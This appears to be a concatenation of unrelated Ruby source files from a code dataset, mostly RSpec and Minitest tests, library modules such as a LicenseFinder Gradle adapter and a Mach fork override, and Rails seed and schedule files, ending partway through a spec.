control_param_local: [0.1, 0.1, 0.1], survival_number: 30) }.to raise_error(ArgumentError)
expect {
MBPSOTeamFormation::MBPSO.new(test2, num_particles: -3, gender_weight: 5, \
ethnicity_weight: 3, initial_inertia: 4.0) }.to raise_error(ArgumentError)
expect {
MBPSOTeamFormation::MBPSO.new(test2, skill_table: {0..12 => 1, 20..49 => 20, 50..59 => 30, 60..76 => 40, 77..84 => 5, 85..100 => 4}, \
forbidden_pairs: [[1, 2], [3, 4]]) }.to raise_error(ArgumentError)
end
end
describe "Running the algorithm" do
it "Return the result in the format of Array of Arrays" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, num_particles: 5, max_iterations: 10)
mbpso2 = MBPSOTeamFormation::MBPSO.new(test2, num_particles: 4, max_iterations: 12)
x = 5
expect(x).to eq(5)
mbpso1.run.each do |x|
expect(x).to be_a(Array)
end
mbpso2.run.each do |x|
expect(x).to be_a(Array)
end
end
it "Exports statistics data into a .csv file with the expected amount of rows and columns" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, num_particles: 15, max_iterations: 20, neigh_change_interval: 1, output_stats: true)
mbpso2 = MBPSOTeamFormation::MBPSO.new(test2, num_particles: 10, max_iterations: 30, neigh_change_interval: 1, output_stats: true)
mbpso1.run
data = CSV.parse(File.read(File.join("\data", 'stats.csv')), headers: false)
expect(data.length).to eq(17)
expect(data[2].length).to eq(20)
mbpso2.run
data = CSV.parse(File.read(File.join("\data", 'stats.csv')), headers: false)
expect(data.length).to eq(12)
expect(data[2].length).to eq(30)
end
it "Exports data only if requested" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, num_particles: 15, max_iterations: 20, neigh_change_interval: 1, output_stats_name: 'should_fail.csv')
mbpso2 = MBPSOTeamFormation::MBPSO.new(test2, num_particles: 20, max_iterations: 2, neigh_change_interval: 1, output_stats: true, output_stats_name: 'should_succeed.csv')
mbpso1.run
expect { CSV.parse(File.read(File.join("\data", 'should_fail.csv')), headers: false) }.to raise_error(Errno::ENOENT)
mbpso2.run
expect(CSV.parse(File.read(File.join("\data", 'should_succeed.csv')), headers: false)).to be_a(Array)
end
it "Successfully allocates students if number of students is not a multiple of the teams size" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(inst_small_table, num_particles: 10, max_iterations: 5)
i = 0
mbpso1.run.each do |x|
i += 1 if x.size == 5
end
expect(i).to eq(2)
mbpso2 = MBPSOTeamFormation::MBPSO.new(inst_small_table2, num_particles: 12, max_iterations: 3)
i = 0
mbpso2.run.each do |x|
i += 1 if x.size == 5
end
expect(i).to eq(1)
end
it "Succesfully allocated students to teams of various sizes" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, team_size: 10, num_particles: 8, max_iterations: 10)
mbpso1.run.each do |x|
expect(x.size).to eq(10)
end
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, team_size: 20, num_particles: 8, max_iterations: 10)
mbpso1.run.each do |x|
expect(x.size).to eq(20)
end
end
end
end
| 51.224359 | 200 | 0.597672 |
086537f1ec2bc241be2ccf1a708471835892bc9b | 822 | module SSHKit
class Coordinator
attr_accessor :hosts
def initialize(raw_hosts)
@raw_hosts = Array(raw_hosts)
@hosts = @raw_hosts.any? ? resolve_hosts : []
end
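    # Runs the given block for each host, using the runner selected by
    # options[:in] (:parallel, :sequence, :groups, or a custom runner class).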
def each(options={}, &block)
if hosts
options = default_options.merge(options)
case options[:in]
when :parallel then Runner::Parallel
when :sequence then Runner::Sequential
when :groups then Runner::Group
else
options[:in]
end.new(hosts, options, &block).execute
else
Runner::Null.new(hosts, options, &block).execute
end
end
private
def default_options
{ in: SSHKit.config.default_runner }
end
def resolve_hosts
@raw_hosts.collect { |rh| rh.is_a?(Host) ? rh : Host.new(rh) }.uniq
end
end
end
| 20.55 | 73 | 0.605839 |
d567bbe3af5c5359f78a7f68f66021da99450ad3 | 2,714 | # frozen_string_literal: true
require_relative("./../test_helper.rb")
require("minitest/hooks/test")
if !ENV["TEXT_TO_SPEECH_APIKEY"].nil? && !ENV["TEXT_TO_SPEECH_URL"].nil?
# Integration tests for the Text to Speech V1 Service
class TextToSpeechV1Test < Minitest::Test
include Minitest::Hooks
attr_accessor :service
def before_all
authenticator = IBMWatson::Authenticators::IamAuthenticator.new(
apikey: ENV["TEXT_TO_SPEECH_APIKEY"]
)
@service = IBMWatson::TextToSpeechV1.new(
url: ENV["TEXT_TO_SPEECH_URL"],
authenticator: authenticator
)
@service.add_default_headers(
headers: {
"X-Watson-Learning-Opt-Out" => "1",
"X-Watson-Test" => "1"
}
)
end
def test_voices
output = @service.list_voices.result
refute(output["voices"].nil?)
voice = @service.get_voice(voice: output["voices"][0]["name"])
refute(voice.nil?)
end
def test_speak
output = @service.synthesize(
text: "my voice is my passport",
accept: "audio/wav",
voice: "en-US_AllisonVoice"
).result
refute(output.nil?)
end
def test_pronunciation
output = @service.get_pronunciation(
text: "hello"
).result
refute(output["pronunciation"].nil?)
end
def test_customizations
service_response = @service.list_voice_models
refute(service_response.nil?)
end
def test_custom_words
skip "Skip to allow for concurrent travis jobs"
customization_id = @service.create_voice_model(
name: "test_integration_customization",
description: "customization for tests"
).result["customization_id"]
words = @service.list_words(customization_id: customization_id).result["words"]
assert(words.length.zero?)
@service.add_word(
customization_id: customization_id,
word: "ACLs",
translation: "ackles"
)
words = [{ "word" => "MACLs", "translation" => "mackles" }]
@service.add_words(
customization_id: customization_id,
words: words
)
@service.delete_word(
customization_id: customization_id,
word: "ACLs"
)
word = @service.get_word(
customization_id: customization_id,
word: "MACLs"
).result
assert(word["translation"] == "mackles")
@service.delete_voice_model(
customization_id: customization_id
)
end
end
else
class TextToSpeechV1Test < Minitest::Test
def test_missing_credentials_skip_integration
skip "Skip text to speech integration tests because credentials have not been provided"
end
end
end
| 28.87234 | 93 | 0.643331 |
792e79a77186f033f1e52e5a4e5eee7a80f69711 | 179 | # frozen_string_literal: true
require 'shreddies/version'
require 'shreddies/engine'
module Shreddies
class Error < StandardError; end
autoload :Json, 'shreddies/json'
end
| 16.272727 | 34 | 0.776536 |
1c932d5ae933a7dfb0f871c1d440b6cff9579354 | 424 | ## $:.unshift(File.dirname(__FILE__))
## minitest setup
require 'minitest/autorun'
## our own code
require 'pluto/tasks'
LogUtils::Logger.root.level = :debug
## some shortcuts
Log = LogDb::Model::Log
Prop = ConfDb::Model::Prop
Site = Pluto::Model::Site
Feed = Pluto::Model::Feed
Item = Pluto::Model::Item
Subscription = Pluto::Model::Subscription
Pluto.setup_in_memory_db
| 15.142857 | 41 | 0.648585 |
e88e4ad59822617263a939a53b6d440d7e174a39 | 126 | json.extract! cliente, :id, :documentos, :nome, :email, :created_at, :updated_at
json.url cliente_url(cliente, format: :json)
| 42 | 80 | 0.746032 |
abcbb67abf3df4f777a812c49f4225fa6b468193 | 1,420 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-cloudwatchrum/types'
require_relative 'aws-sdk-cloudwatchrum/client_api'
require_relative 'aws-sdk-cloudwatchrum/client'
require_relative 'aws-sdk-cloudwatchrum/errors'
require_relative 'aws-sdk-cloudwatchrum/resource'
require_relative 'aws-sdk-cloudwatchrum/customizations'
# This module provides support for CloudWatch RUM. This module is available in the
# `aws-sdk-cloudwatchrum` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# cloud_watch_rum = Aws::CloudWatchRUM::Client.new
# resp = cloud_watch_rum.create_app_monitor(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from CloudWatch RUM are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::CloudWatchRUM::Errors::ServiceError
# # rescues all CloudWatch RUM API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::CloudWatchRUM
GEM_VERSION = '1.3.0'
end
| 26.296296 | 82 | 0.753521 |
21023d041bc9729d29a4190b137675f930155ad8 | 3,155 | require 'spec_helper'
require 'date'
describe CopticVariableFeasts do
it "2014 big fast should return 2014.02.24" do
expect(CopticVariableFeasts::big_fast_start_date(2014)).to eq(Date.new(2014,2,24))
end
it "2011 big fast should return 2011.02.28" do
expect(CopticVariableFeasts::big_fast_start_date(2011)).to eq(Date.new(2011,2,28))
end
it "2008 big fast should return 2008.03.03" do
expect(CopticVariableFeasts::big_fast_start_date(2008)).to eq(Date.new(2008,3,3))
end
it "2014 Jonah fast should return 2014.02.10" do
expect(CopticVariableFeasts::jonah_fast_start_date(2014)).to eq(Date.new(2014,2,10))
end
it "2011 Jonah fast should return 2011.02.14" do
expect(CopticVariableFeasts::jonah_fast_start_date(2011)).to eq(Date.new(2011,2,14))
end
it "2008 Jonah fast should return 2008.02.18" do
expect(CopticVariableFeasts::jonah_fast_start_date(2008)).to eq(Date.new(2008,2,18))
end
it "2014 Messngers fast should return 2014.06.09" do
expect(CopticVariableFeasts::messengers_fast_start_date(2014)).to eq(Date.new(2014,6,9))
end
it "2011 Messngers fast should return 2011.06.13" do
expect(CopticVariableFeasts::messengers_fast_start_date(2011)).to eq(Date.new(2011,6,13))
end
it "2008 Messngers fast should return 2008.06.16" do
expect(CopticVariableFeasts::messengers_fast_start_date(2008)).to eq(Date.new(2008,6,16))
end
it "2014 Messngers feast should return 2014.07.12" do
expect(CopticVariableFeasts::messengers_feast_date(2014)).to eq(Date.new(2014,7,12))
end
it "2011 Messngers feast should return 2011.07.12" do
expect(CopticVariableFeasts::messengers_feast_date(2011)).to eq(Date.new(2011,7,12))
end
it "2008 Messngers feast should return 2008.07.12" do
expect(CopticVariableFeasts::messengers_feast_date(2008)).to eq(Date.new(2008,7,12))
end
it "2014 Thomas Sunday return 2014.04.27" do
expect(CopticVariableFeasts::thomas_sunday(2014)).to eq(Date.new(2014,4,27))
end
it "2011 Thomas Sunday should return 2011.05.01" do
expect(CopticVariableFeasts::thomas_sunday(2011)).to eq(Date.new(2011,5,1))
end
it "2007 ascension feast should return 2007.5.17" do
expect(CopticVariableFeasts::ascension_feast(2007)).to eq(Date.new(2007,5,17))
end
it "2008 ascension feast should return 2008.6.5" do
expect(CopticVariableFeasts::ascension_feast(2008)).to eq(Date.new(2008,6,5))
end
it "2011 ascension feast should return 2011.6.2" do
expect(CopticVariableFeasts::ascension_feast(2011)).to eq(Date.new(2011,6,2))
end
it "2014 ascension feast should return 2014.5.29" do
expect(CopticVariableFeasts::ascension_feast(2014)).to eq(Date.new(2014,5,29))
end
it "2010 ascension feast should return 2010.5.13" do
expect(CopticVariableFeasts::ascension_feast(2010)).to eq(Date.new(2010,5,13))
end
it "2014 pentecost feast should return 2014.6.8" do
expect(CopticVariableFeasts::pentecost_feast(2014)).to eq(Date.new(2014,6,8))
end
it "2013 pentecost feast should return 2013.6.23" do
expect(CopticVariableFeasts::pentecost_feast(2013)).to eq(Date.new(2013,6,23))
end
end
| 34.67033 | 93 | 0.742314 |
03290272a8d82f6219bf5df93c85e3418bf9f449 | 3,038 | # frozen_string_literal: true
require 'xmlsimple'
require 'with_env'
require 'license_finder/package_utils/gradle_dependency_finder'
module LicenseFinder
class Gradle < PackageManager
def initialize(options = {})
super
@command = options[:gradle_command] || package_management_command
@include_groups = options[:gradle_include_groups]
end
def current_packages
WithEnv.with_env('TERM' => 'dumb') do
command = "#{@command} downloadLicenses"
_stdout, stderr, status = Dir.chdir(project_path) { Cmd.run(command) }
raise "Command '#{command}' failed to execute: #{stderr}" unless status.success?
dependencies = GradleDependencyFinder.new(project_path).dependencies
packages = dependencies.flat_map do |xml_file|
options = { 'GroupTags' => { 'dependencies' => 'dependency' } }
contents = XmlSimple.xml_in(xml_file, options).fetch('dependency', [])
contents.map do |dep|
GradlePackage.new(dep, logger: logger, include_groups: @include_groups)
end
end
packages.uniq
end
end
def package_management_command
if Platform.windows?
wrapper = 'gradlew.bat'
gradle = 'gradle.bat'
else
wrapper = './gradlew'
gradle = 'gradle'
end
File.exist?(File.join(project_path, wrapper)) ? wrapper : gradle
end
def project_root?
active? && root_module?
end
private
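    # A project is the root Gradle module when its 'parent' property is null;
    # a temporary settings.gradle is created if Gradle refuses to run because
    # the directory is not part of the build defined by the settings file.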
def root_module?
return false if project_path.to_s.include?('buildSrc')
command = "#{package_management_command} -Dorg.gradle.jvmargs=-Xmx6144m properties | grep 'parent: '"
stdout, stderr, status = Dir.chdir(project_path) { Cmd.run(command) }
if stderr&.include?('not part of the build defined by settings file')
Dir.chdir(project_path) do
Cmd.run('touch settings.gradle')
stdout, stderr, status = Cmd.run(command)
Cmd.run('rm settings.gradle')
end
end
raise "Command '#{command}' failed to execute in #{project_path}: #{stderr}" unless status.success?
root_project_name = stdout.gsub(/\s|parent:|\n/, '')
root_project_name == 'null'
end
def detected_package_path
alternate_build_file = build_file_from_settings(project_path)
return alternate_build_file if alternate_build_file
build_gradle_file
end
def build_gradle_file
kotlin_gradle_path = project_path.join('build.gradle.kts')
return kotlin_gradle_path if File.exist? kotlin_gradle_path
project_path.join('build.gradle')
end
def build_file_from_settings(project_path)
settings_gradle_path = project_path.join 'settings.gradle'
return nil unless File.exist? settings_gradle_path
settings_gradle = File.read settings_gradle_path
match = /rootProject.buildFileName = ['"](?<build_file>.*)['"]/.match settings_gradle
return nil unless match
project_path.join match[:build_file]
end
end
end
| 30.38 | 107 | 0.66919 |
6afd8f40cf703e1f77401282a358a63d4dcd3803 | 1,980 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the bin/rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
Climb.create( nickname: "Pink Slab", climb_type: "Boulder", grade:"V2", color:"Pink", location: "PRG East Falls, Cube Face ", notes:"Starts at the arete and continues to the top of the middle of the wall")
Climb.create( nickname: "Blue Overhang", climb_type: "Boulder", grade:"V1", color:"Blue", location: "PRG East Falls, Shipwreck Starbord ", notes:"Lots of sloper holds. Keep hips low to keep from slipping off")
Climb.create( nickname: "The Destroyer", climb_type: "Boulder", grade:"V3", color:"Green", location: "PRG East Falls, Mushroom Front ", notes:"Start is very crunched up, with a huge mantle move to finish it out. Watch for the heel hook")
Climb.create( nickname: "Try Your Best", climb_type: "Lead", grade:"5.9", color:"Purple", location: "PRG East Falls, Route 12 ", notes:"Really short, but small crimps the whole way.")
Climb.create( nickname: "Cakewalk", climb_type: "Top-Rope", grade:"5.4", color:"Red", location: "PRG East Falls, Route 6 ", notes:"Easily the easiest climb in the gym")
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Very techincal Slab", climb_id: 1)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Not as hard the second time", climb_id: 1)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Cakewalk", climb_id: 5)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Hardest climb i've done so far.", climb_id: 3)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "My fingers hurt", climb_id: 4)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Idk why I did it twice", climb_id: 5) | 90 | 238 | 0.720707 |
7abbd74745ccfbcd4a913a34d920f7ffe06ecea7 | 6,394 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ nome: 'Star Wars' }, { nome: 'Lord of the Rings' }])
# Character.create(nome: 'Luke', movie: movies.first)
Categoria.create( nome: "Alimentos e Bebidas")
Categoria.create( nome: "Arte e Antiguidades")
Categoria.create( nome: "Artigos Religiosos")
Categoria.create( nome: "Assinaturas e Revistas")
Categoria.create( nome: "Automóveis e Veículos")
Categoria.create( nome: "Bebês e Cia")
Categoria.create( nome: "Blu-Ray")
Categoria.create( nome: "Brindes / Materiais Promocionais")
Categoria.create( nome: "Brinquedos e Games")
Categoria.create( nome: "Casa e Decoração")
Categoria.create( nome: "CDs")
Categoria.create( nome: "Colecionáveis")
Categoria.create( nome: "Compras Coletivas")
Categoria.create( nome: "Construção e Ferramentas")
Categoria.create( nome: "Cosméticos e Perfumaria")
Categoria.create( nome: "Cursos e Educação")
Categoria.create( nome: "Discos de Vinil")
Categoria.create( nome: "DVDs")
Categoria.create( nome: "Eletrodomésticos")
Categoria.create( nome: "Eletrônicos")
Categoria.create( nome: "Emissoras de Rádio")
Categoria.create( nome: "Emissoras de Televisão")
Categoria.create( nome: "Empregos")
Categoria.create( nome: "Empresas de Telemarketing")
Categoria.create( nome: "Esporte e Lazer")
Categoria.create( nome: "Fitas K7 Gravadas")
Categoria.create( nome: "Flores, Cestas e Presentes")
Categoria.create( nome: "Fotografia")
Categoria.create( nome: "HD-DVD")
Categoria.create( nome: "Igrejas / Templos / Instituições Religiosas")
Categoria.create( nome: "Indústria, Comércio e Negócios")
Categoria.create( nome: "Infláveis Promocionais")
Categoria.create( nome: "Informática")
Categoria.create( nome: "Ingressos")
Categoria.create( nome: "Instrumentos Musicais")
Categoria.create( nome: "Joalheria")
Categoria.create( nome: "Lazer")
Categoria.create( nome: "LD")
Categoria.create( nome: "Livros")
Categoria.create( nome: "MD")
Categoria.create( nome: "Moda e Acessórios")
Categoria.create( nome: "Motéis")
Categoria.create( nome: "Música Digital")
Categoria.create( nome: "Natal")
Categoria.create( nome: "Negócios e Oportunidades")
Categoria.create( nome: "Outros Serviços")
Categoria.create( nome: "Outros Serviços de Avaliação")
Categoria.create( nome: "Papelaria e Escritório")
Categoria.create( nome: "Páscoa")
Categoria.create( nome: "Pet Shop")
Categoria.create( nome: "Saúde")
Categoria.create( nome: "Serviço Advocaticios")
Categoria.create( nome: "Serviço de Distribuição de Jornais / Revistas")
Categoria.create( nome: "Serviços Administrativos")
Categoria.create( nome: "Serviços Artísticos")
Categoria.create( nome: "Serviços de Abatedouros / Matadouros")
Categoria.create( nome: "Serviços de Aeroportos")
Categoria.create( nome: "Serviços de Agências")
Categoria.create( nome: "Serviços de Aluguel / Locação")
Categoria.create( nome: "Serviços de Armazenagem")
Categoria.create( nome: "Serviços de Assessorias")
Categoria.create( nome: "Serviços de Assistência Técnica / Instalações")
Categoria.create( nome: "Serviços de Associações")
Categoria.create( nome: "Serviços de Bancos de Sangue")
Categoria.create( nome: "Serviços de Bibliotecas")
Categoria.create( nome: "Serviços de Cartórios")
Categoria.create( nome: "Serviços de Casas Lotéricas")
Categoria.create( nome: "Serviços de Confecções")
Categoria.create( nome: "Serviços de Consórcios")
Categoria.create( nome: "Serviços de Consultorias")
Categoria.create( nome: "Serviços de Cooperativas")
Categoria.create( nome: "Serviços de Despachante")
Categoria.create( nome: "Serviços de Engenharia")
Categoria.create( nome: "Serviços de Estacionomentos")
Categoria.create( nome: "Serviços de Estaleiros")
Categoria.create( nome: "Serviços de Exportação / Importação")
Categoria.create( nome: "Serviços de Geólogos")
Categoria.create( nome: "Serviços de joalheiros")
Categoria.create( nome: "Serviços de Leiloeiros")
Categoria.create( nome: "Serviços de limpeza")
Categoria.create( nome: "Serviços de Loja de Conveniência")
Categoria.create( nome: "Serviços de Mão de Obra")
Categoria.create( nome: "Serviços de Órgão Públicos")
Categoria.create( nome: "Serviços de Pesquisas")
Categoria.create( nome: "Serviços de Portos")
Categoria.create( nome: "Serviços de Saúde / Bem Estar")
Categoria.create( nome: "Serviços de Seguradoras")
Categoria.create( nome: "Serviços de Segurança")
Categoria.create( nome: "Serviços de Sinalização")
Categoria.create( nome: "Serviços de Sindicatos / Federações")
Categoria.create( nome: "Serviços de Traduções")
Categoria.create( nome: "Serviços de Transporte")
Categoria.create( nome: "Serviços de Utilidade Pública")
Categoria.create( nome: "Serviços em Agricultura / Pecuária / Piscicultura")
Categoria.create( nome: "Serviços em Alimentação")
Categoria.create( nome: "Serviços em Arte")
Categoria.create( nome: "Serviços em Cine / Foto / Som")
Categoria.create( nome: "Serviços em Comunicação")
Categoria.create( nome: "Serviços em Construção")
Categoria.create( nome: "Serviços em Ecologia / Meio Ambiente")
Categoria.create( nome: "Serviços em Eletroeletrônica / Metal Mecânica")
Categoria.create( nome: "Serviços em Festas / Eventos")
Categoria.create( nome: "Serviços em Informática")
Categoria.create( nome: "Serviços em Internet")
Categoria.create( nome: "Serviços em Jóias / Relógios / Óticas")
Categoria.create( nome: "Serviços em Telefonia")
Categoria.create( nome: "Serviços em Veículos")
Categoria.create( nome: "Serviços Esotéricos / Místicos")
Categoria.create( nome: "Serviços Financeiros")
Categoria.create( nome: "Serviços Funerários")
Categoria.create( nome: "Serviços Gerais")
Categoria.create( nome: "Serviços Gráficos / Editoriais")
Categoria.create( nome: "Serviços para Animais")
Categoria.create( nome: "Serviços para Deficientes")
Categoria.create( nome: "Serviços para Escritórios")
Categoria.create( nome: "Serviços para Roupas")
Categoria.create( nome: "Serviços Socias / Assistenciais")
Categoria.create( nome: "Sex Shop")
Categoria.create( nome: "Shopping Centers")
Categoria.create( nome: "Tabacaria")
Categoria.create( nome: "Tarifas Bancárias")
Categoria.create( nome: "Tarifas Telefônicas")
Categoria.create( nome: "Telefonia")
Categoria.create( nome: "Turismo") | 48.075188 | 111 | 0.766969 |
e835a51a1863a5c501ce7b0ff59ec3734d027e1c | 3,957 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/file_updaters/php/composer"
require_relative "../shared_examples_for_file_updaters"
RSpec.describe Dependabot::FileUpdaters::Php::Composer do
it_behaves_like "a dependency file updater"
let(:updater) do
described_class.new(
dependency_files: files,
dependencies: [dependency],
credentials: credentials
)
end
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}]
end
let(:files) { [composer_json, lockfile] }
let(:composer_json) do
Dependabot::DependencyFile.new(
name: "composer.json",
content: fixture("php", "composer_files", manifest_fixture_name)
)
end
let(:lockfile) do
Dependabot::DependencyFile.new(
name: "composer.lock",
content: fixture("php", "lockfiles", lockfile_fixture_name)
)
end
let(:manifest_fixture_name) { "exact_version" }
let(:lockfile_fixture_name) { "exact_version" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.22.1",
requirements: requirements,
previous_version: "1.0.1",
previous_requirements: previous_requirements,
package_manager: "composer"
)
end
let(:requirements) do
[{
file: "composer.json",
requirement: "1.22.1",
groups: [],
source: nil
}]
end
let(:previous_requirements) do
[{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}]
end
let(:tmp_path) { Dependabot::SharedHelpers::BUMP_TMP_DIR_PATH }
before { Dir.mkdir(tmp_path) unless Dir.exist?(tmp_path) }
describe "#updated_dependency_files" do
subject(:updated_files) { updater.updated_dependency_files }
it "doesn't store the files permanently or output to stdout" do
expect { expect { updated_files }.to_not(output.to_stdout) }.
to_not(change { Dir.entries(tmp_path) })
end
it "returns DependencyFile objects" do
updated_files.each { |f| expect(f).to be_a(Dependabot::DependencyFile) }
expect(updated_files.count).to eq(2)
end
describe "the updated composer_file" do
let(:files) { [composer_json] }
subject(:updated_manifest_content) do
updated_files.find { |f| f.name == "composer.json" }.content
end
context "if no files have changed" do
let(:requirements) { previous_requirements }
it "raises a helpful error" do
expect { updater.updated_dependency_files }.
to raise_error("No files have changed!")
end
end
context "when the manifest has changed" do
it "includes the new requirement" do
expect(described_class::ManifestUpdater).
to receive(:new).
with(dependencies: [dependency], manifest: composer_json).
and_call_original
expect(updated_manifest_content).
to include("\"monolog/monolog\" : \"1.22.1\"")
expect(updated_manifest_content).
to include("\"symfony/polyfill-mbstring\": \"1.0.1\"")
end
end
end
describe "the updated lockfile" do
subject(:updated_lockfile_content) do
updated_files.find { |f| f.name == "composer.lock" }.content
end
it "updates the dependency version in the lockfile" do
expect(described_class::LockfileUpdater).
to receive(:new).
with(
credentials: credentials,
dependencies: [dependency],
dependency_files: files
).
and_call_original
expect(updated_lockfile_content).to include("\"version\": \"1.22.1\"")
expect(updated_lockfile_content).to include("\"prefer-stable\": false")
end
end
end
end
| 28.673913 | 79 | 0.638615 |
aca6c41ccf44f548fb80a7d01d16bbda9b9f7090 | 347 | # this is used in config/environments/production.rb.
#don't wanna use NewRelic -Iratu
env "RAILS_LOG_TO_STDOUT", "true"
set :output, "log/whenever.log"
every :hour do
rake "maintenance:hourly"
end
every :day do
rake "maintenance:daily"
end
every :sunday do
rake "maintenance:weekly"
end
every :month do
rake "maintenance:monthly"
end
| 15.772727 | 52 | 0.743516 |
f7fc72a03f7bdf479c068ecb9483ccd46d918144 | 2,783 | # Redmine - project management software
# Copyright (C) 2006-2014 Jean-Philippe Lang
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
require File.expand_path('../../../../../test_helper', __FILE__)
require 'redmine/field_format'
class Redmine::VersionFieldFormatTest < ActionView::TestCase
fixtures :projects, :versions, :trackers
def test_version_status_should_reject_blank_values
field = IssueCustomField.new(:name => 'Foo', :field_format => 'version', :version_status => ["open", ""])
field.save!
assert_equal ["open"], field.version_status
end
def test_existing_values_should_be_valid
field = IssueCustomField.create!(:name => 'Foo', :field_format => 'version', :is_for_all => true, :trackers => Tracker.all)
project = Project.generate!
version = Version.generate!(:project => project, :status => 'open')
issue = Issue.generate!(:project_id => project.id, :tracker_id => 1, :custom_field_values => {field.id => version.id})
field.version_status = ["open"]
field.save!
issue = Issue.order('id DESC').first
assert_include [version.name, version.id.to_s], field.possible_custom_value_options(issue.custom_value_for(field))
assert issue.valid?
end
def test_possible_values_options_should_return_project_versions
field = IssueCustomField.new(:field_format => 'version')
project = Project.find(1)
expected = project.shared_versions.sort.map(&:name)
assert_equal expected, field.possible_values_options(project).map(&:first)
end
def test_possible_values_options_should_return_project_versions_with_selected_status
field = IssueCustomField.new(:field_format => 'version', :version_status => ["open"])
project = Project.find(1)
expected = project.shared_versions.sort.select {|v| v.status == "open"}.map(&:name)
assert_equal expected, field.possible_values_options(project).map(&:first)
end
def test_cast_value_should_not_raise_error_when_array_contains_value_casted_to_nil
field = IssueCustomField.new(:field_format => 'version')
assert_nothing_raised do
field.cast_value([1,2, 42])
end
end
end
| 41.537313 | 127 | 0.743083 |
bb937a708c131dfe96e633fcbcc8e01187531dc7 | 2,387 | require 'set'
require 'mach'
module ProcessShared
module Mach
include ::Mach
# The set of ports that should be shared to forked child
# processes.
#
# FIXME: protect with (original ruby) mutex?
def self.shared_ports
@shared_ports ||= Set.new
end
def self.after_fork_child
parent_port = Task.self.get_bootstrap_port
# give parent permission to send to child's task port
Task.self.copy_send(parent_port)
# create a second port and give the parent permission to send
port = Port.new
port.insert_right(:make_send)
port.copy_send(parent_port)
# parent copies sem, mutex port permissions directly to child
# task port
# wait for parent to send orig bootstrap port
orig_bootstrap = port.receive_right
Task.self.set_special_port(:bootstrap, orig_bootstrap)
end
def self.after_fork_parent(port)
child_task_port = port.receive_right
shared_ports.each do |p|
p.insert_right(:copy_send, :ipc_space => child_task_port)
end
child_port = port.receive_right
::Mach::bootstrap_port.copy_send(child_port)
end
end
end
module Kernel
# Override to call Process::fork.
def self.fork(*args, &block)
Process.fork(*args, &block)
end
def fork(*args, &block)
Process.fork(*args, &block)
end
end
module Process
class << self
unless respond_to? :__mach_original_fork__
alias_method :__mach_original_fork__, :fork
end
# Override to first copy all shared ports (semaphores, etc.) from
# parent process to child process.
def fork
# make a port for receiving message from child
port = Mach::Port.new
port.insert_right(:make_send)
Mach::Task.self.set_bootstrap_port(port)
if block_given?
pid = __mach_original_fork__ do
ProcessShared::Mach.after_fork_child
yield
end
ProcessShared::Mach.after_fork_parent(port)
pid
else
if pid = __mach_original_fork__
ProcessShared::Mach.after_fork_parent(port)
pid
else
ProcessShared::Mach.after_fork_child
nil
end
end
end
end
end
require 'mach/time_spec'
require 'process_shared/time_spec'
# Monkey patch to add #add_seconds! method
Mach::TimeSpec.send(:include, ProcessShared::TimeSpec)
| 24.357143 | 69 | 0.668622 |
1a3d6dd58cd69553f6aa7fdeec3f3ace1697cf41 | 121 | # frozen_string_literal: true
module Bitaculous
module Thorify # :nodoc:
require_relative 'thorify/task'
end
end | 17.285714 | 35 | 0.760331 |
912fda30ade4e1e8351581e247bbaca316f3cad2 | 2,688 | # frozen_string_literal: true
require './lib/arena_slack/api/arena'
require './lib/arena_slack/api/slack'
require './lib/arena_slack/arena_commented'
RSpec.describe 'Arena comment event' do
it 'returns a block title for image blocks' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.source') { 'Block Source' }
allow(story).to receive_message_chain('target.title') { 'Block Title' }
allow(story).to receive_message_chain('target.content') { 'Block Content' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_title
expect(comment_item).to eq('Block Title')
end
it 'returns a block title for image blocks with no source' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.source') { nil }
allow(story).to receive_message_chain('target.title') { 'Block Title' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_title
expect(comment_item).to eq('Block Title')
end
it 'returns target content for everything else' do
story = double('Block')
